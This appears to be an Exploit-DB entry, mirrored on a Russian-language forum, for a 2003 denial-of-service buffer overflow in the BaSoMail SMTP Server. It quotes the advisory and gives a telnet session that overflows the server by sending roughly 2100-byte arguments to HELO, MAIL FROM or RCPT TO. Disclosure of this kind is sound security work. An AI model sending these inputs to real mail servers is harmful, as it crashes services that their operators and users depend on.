- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 22668
- Проверка EDB
-
- Пройдено
- Автор
- ZIV KAMIR
- Тип уязвимости
- DOS
- Платформа
- WINDOWS
- CVE
- null
- Дата публикации
- 2003-05-28
Код:
source: https://www.securityfocus.com/bid/7726/info
BaSoMail SMTP Server has been reported prone to a buffer overflow vulnerability.
The issue is likely due to a lack of sufficient bounds checking performed on arguments passed to SMTP commands.
Although unconfirmed and speculative, due to the nature of this vulnerability, it may be possible to exploit this issue to execute arbitrary attacker supplied code.
# Telnet The_SMTP_Server_IP_Address 25
220 Welcome to BaSoMail (www.BaSo.no)
HELO <ccccc....[Buffer size 2100 Bytes]>
Or
Mail From : <ccccc....[Buffer size 2100 Bytes @xyz.com]>
Or
Rcpt to : <ccccc....[Buffer size 2100 Bytes @xyz.com]>
Quit
- Источник
- www.exploit-db.com